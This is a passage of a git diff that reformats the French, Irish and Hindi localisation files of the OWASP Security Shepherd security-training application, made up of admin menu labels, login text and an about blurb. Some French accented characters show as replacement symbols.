+index.link.admin.config.change = Changer la Disposition du Module
+index.link.admin.config.feedback = Configuration des Feedbacks
+index.link.admin.config.openClose = Ouvrir/Fermer les Inscriptions
+index.link.admin.config.scoreboard = Configuration du Tableau du Bord
+index.link.admin.config.coreDb = Installer la Base de Donn�es Centrale
+index.link.admin.moduleManage = Gestion des Modules
+index.link.admin.moduleManage.block = Pr�f�rences de Blocage des Modules
+index.link.admin.moduleManage.openClose = Ouvrir et Fermer des Modules
+index.link.admin.moduleManage.openCloseCategory = Ouvrir et Fermer par Cat�gorie
+index.link.admin.moduleManage.feedback = Voir les Feedbacks
+index.link.admin.moduleManage.progress = Voir les Progr�s
+index.link.admin.userMange = Gestion des Utilisateurs
+index.link.admin.userMange.addPlayer = Ajouter des Joueurs
+index.link.admin.userMange.addPoints = Ajouter/D�duire des Points aux Joueurs
+index.link.admin.userMange.assignPlayer = Assigner des Joueurs � une Classe
+index.link.admin.userMange.createClass = Cr�er une Classe
+index.link.admin.userMange.createAdmin = Cr�er un Nouvel Admin
+index.link.admin.userMange.resetPass = R�initialiser le mot de passe
+index.link.admin.userMange.setDefaultPlayerClass = Configurer une Classe par D�faut
+index.link.admin.userMange.suspendPlayer = Suspendre le Joueur
+index.link.admin.userMange.unsuspendPlayer = Annuler la Suspension du Joueur
+index.link.admin.userMange.upgradeToAdmin = Promouvoir le Joueur en Admin
+login.text.sponsers = Sponsors du Projet
+readyToPlay.title.readyToPlay = Security Shepherd - Pr�t ?
+readyToPlay.header.notReady = Vous n'�tes pas pr�t !
+readyToPlay.title.enteredGame = Vous �tes entr� dans le jeu !
+login.text.proxy_question = Avez-vous besoin d'un proxy ?
+login.text.download_proxy = T�l�charger un proxy HTTP
+
+
+login.link.zap_win = ZAP pour Windows
+login.link.zap_lin = ZAP pour Linux
+login.link.zap_mac = ZAP pour Mac
+
+
+blockedMessage.text.info.levelBlocked = Un administrateur a ferm� ce niveau. Pour savoir quand il sera disponible, veuillez vous adressez � la personne en charge de l'application.
+getStarted.text.moduleInfo.openFloor = Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencez un, cliquez sur un ent�te, tel que Lessons ou Modules, dans le menu lat�ral pour voir quels modules sont actuellement disponibles !
+getStarted.text.moduleInfo.incrementalFloor = Maintenant que vous �tes connect�s, commen�ons avec quelques challenges ! Pour en commencer un, cliquez sur le bouton "Challenge Suivant" sur la gauche !
+getStarted.text.moduleInfo = Maintenant que vous �tes connect�s, commen�ons avec quelques modules ! Pour en commencer un, cliquez sur un ent�te, tel que Field Training ou Corporal, dans le menu lat�ral pour voir quels modules sont actuellement disponibles ! Plus le module est bas dans le menu, plus il vaut de points !
+getStarted.text.configureShepherd.asAnAdmin = En tant qu'administrateur, vous pouvez d�finir la port�e de Security Shepherd. Vous pouvez facilement changer la disposition du jeu en Web ou Mobile Application avec les boutons suivants. Vous pouvez aussi ouvrir le panel administrateur, dans le coin en haut � gauche de la page, pour ouvrir ou fermer des sujets sp�cifiques.
+getStarted.text.checkShepConfigMsg = Si vous ne pouvez pas voir le message sous ce paragraphe, merci de vous assurer que l'instance Security Shepherd est correctement configur�e.
+getStarted.text.info.changePassword = Votre mot de passe est temporaire. Cela signifie que quelqu'un d'autre le connait ! Changez le maintenant pour plus de s�curit� !
+login.text.info = Utilisez vos informations d'identification Security Shepherd pour vous connecter.
+login.text.regInfo = Enregistrer un compte Security Shepherd ici !
+login.text.about_blurb = OWASP Security Shepherd Project a �t� con�u et d�velopp� avec pour objectif de favoriser et am�liorer la sensibilit� � la s�curit� des applications sur un ensemble vari� de comp�tences. Ce projet permet aux utilisateurs d'apprendre et d'am�liorer leur aptitudes en tests d'intrusion. Cela est r�aliser au travers de le�ons et challenges techniques. Les le�ons aident les utilisateurs � finir un module tandis que les challenges permettent de mettre en pratique les acquis.
OWASP Security Shepherd Project couvre les Top 10 WebApp Risks et Modile Risks de l'OWASP. En utilisant ces risques comme base d'apprentissage, les failles de s�curit� les plus communes peuvent �tre explor�es et leur impact mieux compris. Beaucoup de ces niveaux inclus des protections insuffisantes et des corrections partielles, telles que des filtrages par blacklist, des mauvaises configurations et des m�thodes de codage atroces. Ces challenges ont �t� con�u pour les professionnels autant que pour les �tudiants.
+login.text.sponsers_blurb = OWASP Security Shepherd Project reconna�t aussi avec gratitude le soutien apport� par nos sponsors. Nous vous encourageons � visiter leur site web et � les suivre sur Twitter.
+login.text.thanks = OWASP Security Shepherd Project tient � remercier Dr. Anthony Keane et ITB Security Research Lab pour leur h�bergement de https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Rafra�chissez la page d'accueil ! Si cette erreur persiste, essayez de vous reconnecter. Si cela ne r�soud pas le probl�me, contactez un administrateur !
+readyToPlay.text.info.enteredGame = Maintenant que vous pouvez voir ce message vous �tes pr�t ! Commencez � lire les le�ons et � r�soudre les challenges !
Souvenez-vous, les niveaux sont des sous-applications. Gardez le jeu dans ces applications ! Les ID de session n'en font pas partie ! Vous ne feriez que vous d�connecter vous-m�mes !
Si vous n'avez pas encore configur� un proxy web, vous devriez. Cela vous sera particuli�rement utile !
diff --git a/src/main/resources/i18n/text_ga.properties b/src/main/resources/i18n/text_ga.properties
index f7b29bcd5..ecd6ba01f 100644
--- a/src/main/resources/i18n/text_ga.properties
+++ b/src/main/resources/i18n/text_ga.properties
@@ -1,77 +1,80 @@
-generic.text.aboutSecShep=Faoi Security Shepherd
-generic.text.admin=Riarachán
-generic.text.cheat=Aicearra
-generic.text.challenges=Dúshlán
-generic.text.commentMessage.1=You are currently looking at the core server. (Translation Required)
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here. (Translation Required)
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page. (Translation Required)
-generic.text.commentMessage.4=Try a tool like Firebug to make this stuff easier. (Translation Required)
-generic.text.configuration=Cumraíocht
-generic.text.configureShepherd=Cumraigh Shepherd
-generic.text.confirmPasswd=Deimhnigh Pasfhocal
-generic.text.confirmEmailAddr=Deimhnigh Ríomhphost
-generic.text.emailAddr=Ríomhphost
-generic.text.lessons=Ceachtanna
-generic.text.login=Cuír isteach
-generic.text.logout=logáil Amach
-generic.text.loading=Ag Luchtú...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Focal Faire
-generic.text.pleaseWait=Déan Teagmháil Linn!
-generic.text.register=Cláraigh
-generic.text.scoreboard=Scórchlár
-generic.text.searchModules=Search Modules (Translation Required)
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.submit=Cúir Isteach
-generic.text.username=Ainm Úsáideora
-generic.text.welcome=Fáilte
-getter.button.nextChallenge=Faigh an Chéad Dúshlán Eile
-login.label.info=Bain úsáid as do Dintiúir Security Shepherd a Logáil isteach.
-login.label.regInfo=Cláraigh Cuntas Security Shepherd anseo!
-login.label.proxy_question=Gá duit seachfhreastalaí?
-login.label.about_blurb=Tá an tionscadal OWASP Security Shepherd Dearadh agus cuireadh i bhfeidhm leis an aidhm a chothú agus feasacht slándála i bhfeidhm i measc scil-leagtar tionscadal éagsúil demographic.This fheabhsú ar chumas úsáideoirí a fhoghlaim nó a fheabhsú ar scileanna tástála treá láimhe atá ann cheana féin. Seo i gcrích trí theicnící cheachta agus dúshlán. Soláthraíonn ceacht úsáideoir le go leor de chabhair i gcrích go mhodúl, i gcás ina gcuireann dúshlán cad é an t-úsáideoir a foghlaimíodh sa cheacht a úsáid.
Clúdaíonn an tionscadal OWASP Slándáil Aoire na rioscaí app gréasáin OWASP Top Ten agus clúdaíonn an OWASP Top Ten Soghluaiste rioscaí chomh maith. Ag baint úsáide as na rioscaí mar leaba tástála dúshlán, is féidir le leochaileachtaí slándála a iniúchadh agus a dtionchar ar chóras thuiscint. I measc go leor de na leibhéil nach leor mhaoluithe agus cosaintí ar na rioscaí, ar nós scagairí blacklist, scéimeanna ionchódú atrocious, meicníochtaí slándála barbaric agus cumraíocht slándála bochta. Na modúil a crafted chun ní hamháin dúshlán do novice slándála, ach gairmithe slándála chomh maith a chur ar fáil.
-login.label.download_proxy=Íoslódáil Seachfhreastalaí HTTP anseo
-login.label.zap_win=ZAP do Windows
-login.label.zap_lin=ZAP do Linux
-login.label.zap_mac=ZAP do Mac
-login.label.sponsers=Urraitheoirí tionscadal
-login.label.sponsers_blurb=Ba mhaith leis an tionscadal OWASP Slándáil Shepherd buíochas a ghabháil agus a ghabháil leis an tacaíocht fhlaithiúil dár urraitheoirí. Déan seiceáil amach a leathanaigh ghréasáin agus iad a leanúint ar twitter.
-login.label.thanks=Ba mhaith leis an Tionscadal Shepherd OWASP Slándáil buíochas a ghabháil le Dr Anthony Keane agus an Taighde ITB Slándáil Saotharlann chun óstáil an bpobal https://owasp.securityShepherd.eu freisin!
-getStarted.label.lets_start=Lig dúinn Tosaigh
-index.label.welcome=Fáilte
-index.label.logout=Logála Amach
-index.button.admin=Riarachán
-index.link.admin.cheatSheet.manage=Bainistíocht Leathanach Leideanna
-index.link.admin.cheatSheet.manage.create=Cruthaigh Leathanach Leideanna Nua
-index.link.admin.cheatSheet.manage.disable=Dichumasaigh Leathanach Leideanna
-index.link.admin.cheatSheet.manage.enable=Ar chumas Leathanach Leideanna
-index.link.admin.config=Cumraíocht
-index.link.admin.config.about=Maidir Security Shepherd
-index.link.admin.config.change=Athrú Modúl Leagan Amach
-index.link.admin.config.feedback=Cumraíocht Aiseolais
-index.link.admin.config.openClose=Oscail/Dún Chlárúcháin
-index.link.admin.config.scoreboard=Clár Scór Cumraíocht
-index.link.admin.config.coreDb=Bunachar Sonraí Lárnach a Leagtar
-index.link.admin.moduleManage=Bainistíocht modúl
-index.link.admin.moduleManage.block=Modúl Bloc Socrú
-index.link.admin.moduleManage.openClose=Modúil Oscailte agus Dún
-index.link.admin.moduleManage.openCloseCategory=Oscailte nó Dún réir Catagóire
-index.link.admin.moduleManage.feedback=Féach ar Aiseolas
-index.link.admin.moduleManage.progress=Féach ar Dhul Chun Cinn
-index.link.admin.userMange=Bainistíocht Úsáideoir
-index.link.admin.userMange.addPlayer=Cuir le Imreoir
-index.link.admin.userMange.addPoints=Cuir le / Asbhain Pointí Imreoir
-index.link.admin.userMange.assignPlayer=Imreoir go Rang a Shannadh
-index.link.admin.userMange.createClass=Cruthaigh Rang
-index.link.admin.userMange.createAdmin=Cruthaigh Riarachán Nua
-index.link.admin.userMange.resetPass=Pasfhocal a Athshocrú
-index.link.admin.userMange.setDefaultPlayerClass=Socraigh Réamhshocrú Imreoir Rang
-index.link.admin.userMange.suspendPlayer=Fionraí Imreoir
-index.link.admin.userMange.unsuspendPlayer=Fionraí Imreoir a Chealú
-index.link.admin.userMange.upgradeToAdmin=Imreoir Uasghrádú go Riarachán
-index.button.scoreboard=Clár Scór
-index.button.cheat=Aicearra
-index.button.lessons=Rang
-index.button.challenges=Dúshlán
+generic.text.aboutSecShep = Faoi Security Shepherd
+generic.text.admin = Riarachán
+generic.text.cheat = Aicearra
+generic.text.challenges = Dúshlán
+generic.text.commentMessage.1 = You are currently looking at the core server. (Translation Required)
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here. (Translation Required)
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page. (Translation Required)
+generic.text.commentMessage.4 = Try a tool like Firebug to make this stuff easier. (Translation Required)
+generic.text.configuration = Cumraíocht
+generic.text.configureShepherd = Cumraigh Shepherd
+generic.text.confirmPasswd = Deimhnigh Pasfhocal
+generic.text.confirmEmailAddr = Deimhnigh Ríomhphost
+generic.text.emailAddr = Ríomhphost
+generic.text.lessons = Ceachtanna
+generic.text.login = Cuír isteach
+generic.text.logout = logáil Amach
+generic.text.loading = Ag Luchtú...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Focal Faire
+generic.text.pleaseWait = Déan Teagmháil Linn!
+generic.text.register = Cláraigh
+generic.text.scoreboard = Scórchlár
+generic.text.searchModules = Search Modules (Translation Required)
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.submit = Cúir Isteach
+generic.text.username = Ainm Úsáideora
+generic.text.welcome = Fáilte
+
+getter.button.nextChallenge = Faigh an Chéad Dúshlán Eile
+
+
+login.label.info = Bain úsáid as do Dintiúir Security Shepherd a Logáil isteach.
+login.label.regInfo = Cláraigh Cuntas Security Shepherd anseo!
+login.label.proxy_question = Gá duit seachfhreastalaí?
+login.label.about_blurb = Tá an tionscadal OWASP Security Shepherd Dearadh agus cuireadh i bhfeidhm leis an aidhm a chothú agus feasacht slándála i bhfeidhm i measc scil-leagtar tionscadal éagsúil demographic.This fheabhsú ar chumas úsáideoirí a fhoghlaim nó a fheabhsú ar scileanna tástála treá láimhe atá ann cheana féin. Seo i gcrích trí theicnící cheachta agus dúshlán. Soláthraíonn ceacht úsáideoir le go leor de chabhair i gcrích go mhodúl, i gcás ina gcuireann dúshlán cad é an t-úsáideoir a foghlaimíodh sa cheacht a úsáid.
Clúdaíonn an tionscadal OWASP Slándáil Aoire na rioscaí app gréasáin OWASP Top Ten agus clúdaíonn an OWASP Top Ten Soghluaiste rioscaí chomh maith. Ag baint úsáide as na rioscaí mar leaba tástála dúshlán, is féidir le leochaileachtaí slándála a iniúchadh agus a dtionchar ar chóras thuiscint. I measc go leor de na leibhéil nach leor mhaoluithe agus cosaintí ar na rioscaí, ar nós scagairí blacklist, scéimeanna ionchódú atrocious, meicníochtaí slándála barbaric agus cumraíocht slándála bochta. Na modúil a crafted chun ní hamháin dúshlán do novice slándála, ach gairmithe slándála chomh maith a chur ar fáil.
+login.label.download_proxy = Íoslódáil Seachfhreastalaí HTTP anseo
+login.label.zap_win = ZAP do Windows
+login.label.zap_lin = ZAP do Linux
+login.label.zap_mac = ZAP do Mac
+login.label.sponsers = Urraitheoirí tionscadal
+login.label.sponsers_blurb = Ba mhaith leis an tionscadal OWASP Slándáil Shepherd buíochas a ghabháil agus a ghabháil leis an tacaíocht fhlaithiúil dár urraitheoirí. Déan seiceáil amach a leathanaigh ghréasáin agus iad a leanúint ar twitter.
+login.label.thanks = Ba mhaith leis an Tionscadal Shepherd OWASP Slándáil buíochas a ghabháil le Dr Anthony Keane agus an Taighde ITB Slándáil Saotharlann chun óstáil an bpobal https://owasp.securityShepherd.eu freisin!
+getStarted.label.lets_start = Lig dúinn Tosaigh
+index.label.welcome = Fáilte
+index.label.logout = Logála Amach
+index.button.admin = Riarachán
+index.link.admin.cheatSheet.manage = Bainistíocht Leathanach Leideanna
+index.link.admin.cheatSheet.manage.create = Cruthaigh Leathanach Leideanna Nua
+index.link.admin.cheatSheet.manage.disable = Dichumasaigh Leathanach Leideanna
+index.link.admin.cheatSheet.manage.enable = Ar chumas Leathanach Leideanna
+index.link.admin.config = Cumraíocht
+index.link.admin.config.about = Maidir Security Shepherd
+index.link.admin.config.change = Athrú Modúl Leagan Amach
+index.link.admin.config.feedback = Cumraíocht Aiseolais
+index.link.admin.config.openClose = Oscail/Dún Chlárúcháin
+index.link.admin.config.scoreboard = Clár Scór Cumraíocht
+index.link.admin.config.coreDb = Bunachar Sonraí Lárnach a Leagtar
+index.link.admin.moduleManage = Bainistíocht modúl
+index.link.admin.moduleManage.block = Modúl Bloc Socrú
+index.link.admin.moduleManage.openClose = Modúil Oscailte agus Dún
+index.link.admin.moduleManage.openCloseCategory = Oscailte nó Dún réir Catagóire
+index.link.admin.moduleManage.feedback = Féach ar Aiseolas
+index.link.admin.moduleManage.progress = Féach ar Dhul Chun Cinn
+index.link.admin.userMange = Bainistíocht Úsáideoir
+index.link.admin.userMange.addPlayer = Cuir le Imreoir
+index.link.admin.userMange.addPoints = Cuir le / Asbhain Pointí Imreoir
+index.link.admin.userMange.assignPlayer = Imreoir go Rang a Shannadh
+index.link.admin.userMange.createClass = Cruthaigh Rang
+index.link.admin.userMange.createAdmin = Cruthaigh Riarachán Nua
+index.link.admin.userMange.resetPass = Pasfhocal a Athshocrú
+index.link.admin.userMange.setDefaultPlayerClass = Socraigh Réamhshocrú Imreoir Rang
+index.link.admin.userMange.suspendPlayer = Fionraí Imreoir
+index.link.admin.userMange.unsuspendPlayer = Fionraí Imreoir a Chealú
+index.link.admin.userMange.upgradeToAdmin = Imreoir Uasghrádú go Riarachán
+index.button.scoreboard = Clár Scór
+index.button.cheat = Aicearra
+index.button.lessons = Rang
+index.button.challenges = Dúshlán
diff --git a/src/main/resources/i18n/text_hi.properties b/src/main/resources/i18n/text_hi.properties
index fae95ef7a..99ceeb414 100644
--- a/src/main/resources/i18n/text_hi.properties
+++ b/src/main/resources/i18n/text_hi.properties
@@ -1,99 +1,105 @@
-generic.text.aboutSecShep=About Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Chunauti
-generic.text.commentMessage.1=Aap currently core server per dekh rahe ho.
-generic.text.commentMessage.2=Yaha pe tumhare liye Security Shepherd par koi level related mahiti nahi he!.
-generic.text.commentMessage.3=Tum Shayad is page par embedded iframe khoj rahe ho.
-generic.text.commentMessage.4=Is tool ko firebug ki tarah use kro aur simple banao.
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirm Password
-generic.text.confirmEmailAddr=Confirm Email
-generic.text.emailAddr=Email Address
-generic.text.lessons=Lessons
-generic.text.login=Login
-generic.text.logout=Logout
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Password
-generic.text.pleaseWait=Please Wait!
-generic.text.register=Register
-generic.text.scoreboard=Scoreboard
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd Version: 2.4
-generic.text.sorryError=Sorry yahape error payi gayi he
-generic.text.submitResult=Result Key yaha pe submit karo
-generic.text.submit=Submit
-generic.text.username=Username
-generic.text.welcome=Welcome
-getter.button.completed=Completed
-getter.button.nextChallenge=Get Next Challenge
-getter.button.finished=Tumhne pura kiya!
-getter.button.noModulesFound=Koi Modules Mil nahi rahe
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Let's Get Started
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-login.text.sponsers=Project k Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - Tum Taiyar ho?
-readyToPlay.header.notReady=Tum taiyar nahi ho!
-readyToPlay.title.enteredGame=tum game me enter ho gaye!
-login.text.proxy_question=Tumhe proxy chahiye?
-login.text.download_proxy=Download HTTP Proxy yahase
-login.link.zap_win=ZAP Windows k liye
-login.link.zap_lin=ZAP Linux k liye
-login.link.zap_mac=ZAP Mac k liye
-blockedMessage.text.info.levelBlocked=Tumh Acche ja rahe ho! Administrator ne currently is level ko closedkiya he. To ye level kab available hoga ye janne k liye,jo is application ka in charge hai usse puccho!
-getStarted.text.moduleInfo.openFloor=Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, Lessons or Modules, in the side menu to see what modules are currently available!
-getStarted.text.moduleInfo.incrementalFloor=Ab tum signed in ho, lets get started with some Security Shepherd challenges! To start one, click the "Get Next Challenge" button on the left!
-getStarted.text.moduleInfo=Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
-getStarted.text.configureShepherd.asAnAdmin=Administrator k taur pe tum Security Shepherd ke scope ko set kar sakte ho. tum turant game layout ko Web or Mobile Application change kar sakate ho,
+generic.text.aboutSecShep = About Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Chunauti
+generic.text.commentMessage.1 = Aap currently core server per dekh rahe ho.
+generic.text.commentMessage.2 = Yaha pe tumhare liye Security Shepherd par koi level related mahiti nahi he!.
+generic.text.commentMessage.3 = Tum Shayad is page par embedded iframe khoj rahe ho.
+generic.text.commentMessage.4 = Is tool ko firebug ki tarah use kro aur simple banao.
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirm Password
+generic.text.confirmEmailAddr = Confirm Email
+generic.text.emailAddr = Email Address
+generic.text.lessons = Lessons
+generic.text.login = Login
+generic.text.logout = Logout
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Password
+generic.text.pleaseWait = Please Wait!
+generic.text.register = Register
+generic.text.scoreboard = Scoreboard
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd Version: 2.4
+generic.text.sorryError = Sorry yahape error payi gayi he
+generic.text.submitResult = Result Key yaha pe submit karo
+generic.text.submit = Submit
+generic.text.username = Username
+generic.text.welcome = Welcome
+
+getter.button.completed = Completed
+getter.button.nextChallenge = Get Next Challenge
+getter.button.finished = Tumhne pura kiya!
+getter.button.noModulesFound = Koi Modules Mil nahi rahe
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Let's Get Started
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+login.text.sponsers = Project k Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - Tum Taiyar ho?
+readyToPlay.header.notReady = Tum taiyar nahi ho!
+readyToPlay.title.enteredGame = tum game me enter ho gaye!
+login.text.proxy_question = Tumhe proxy chahiye?
+login.text.download_proxy = Download HTTP Proxy yahase
+
+
+login.link.zap_win = ZAP Windows k liye
+login.link.zap_lin = ZAP Linux k liye
+login.link.zap_mac = ZAP Mac k liye
+
+
+blockedMessage.text.info.levelBlocked = Tumh Acche ja rahe ho! Administrator ne currently is level ko closedkiya he. To ye level kab available hoga ye janne k liye,jo is application ka in charge hai usse puccho!
+getStarted.text.moduleInfo.openFloor = Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, Lessons or Modules, in the side menu to see what modules are currently available!
+getStarted.text.moduleInfo.incrementalFloor = Ab tum signed in ho, lets get started with some Security Shepherd challenges! To start one, click the "Get Next Challenge" button on the left!
+getStarted.text.moduleInfo = Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as Field Training or Corporal, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
+getStarted.text.configureShepherd.asAnAdmin = Administrator k taur pe tum Security Shepherd ke scope ko set kar sakte ho. tum turant game layout ko Web or Mobile Application change kar sakate ho,
or you can open the Admin Module Management menu, at the top left of the page,specific topics ko open ya close krne k liye.
-getStarted.text.checkShepConfigMsg=agar tum paragraph k bad message nahi dekh pate to please ensure Security Shepherd instance sahi configured hua hai.
-getStarted.text.info.changePassword=tumhara password is a temporary password. so koi aur bhi janta hai aapke password ko! Pahele apne password ko change kar k secure bano!
-login.text.info=Use your Security Shepherd Credentials to Login.
-login.text.regInfo=Register a Security Shepherd Account here!
-login.text.about_blurb=The OWASP Security Shepherd project ko isi liye banaya gaya hai ki application security awareness ko support mile or sudhar ho,sari tarike ki skill-set vale demographic people k liye.Is project users ko manual penetration testing skills sikhata hai aur sudhar bhi lata hai.Sare lesson aur challenge techniques se ye sabit hota hai.Ye lesson user ko module complete karne me sabhi help karega, ki jaha ye challenge user is lesson se kya sikha vo use kar shakta hai.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security muskeliyo ko explre karta hai aur system par uske impact ko bhi samajata hai. Is me se kai levels pahechan or fix nahi pane vale uplabdh workaround aur risks jaise ki blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration.The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
If you havn't already configured a web proxy, you better! It makes things much easier!
+getStarted.text.checkShepConfigMsg = agar tum paragraph k bad message nahi dekh pate to please ensure Security Shepherd instance sahi configured hua hai.
+getStarted.text.info.changePassword = tumhara password is a temporary password. so koi aur bhi janta hai aapke password ko! Pahele apne password ko change kar k secure bano!
+login.text.info = Use your Security Shepherd Credentials to Login.
+login.text.regInfo = Register a Security Shepherd Account here!
+login.text.about_blurb = The OWASP Security Shepherd project ko isi liye banaya gaya hai ki application security awareness ko support mile or sudhar ho,sari tarike ki skill-set vale demographic people k liye.Is project users ko manual penetration testing skills sikhata hai aur sudhar bhi lata hai.Sare lesson aur challenge techniques se ye sabit hota hai.Ye lesson user ko module complete karne me sabhi help karega, ki jaha ye challenge user is lesson se kya sikha vo use kar shakta hai.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security muskeliyo ko explre karta hai aur system par uske impact ko bhi samajata hai. Is me se kai levels pahechan or fix nahi pane vale uplabdh workaround aur risks jaise ki blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration.The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
If you havn't already configured a web proxy, you better! It makes things much easier!
diff --git a/src/main/resources/i18n/text_pt.properties b/src/main/resources/i18n/text_pt.properties
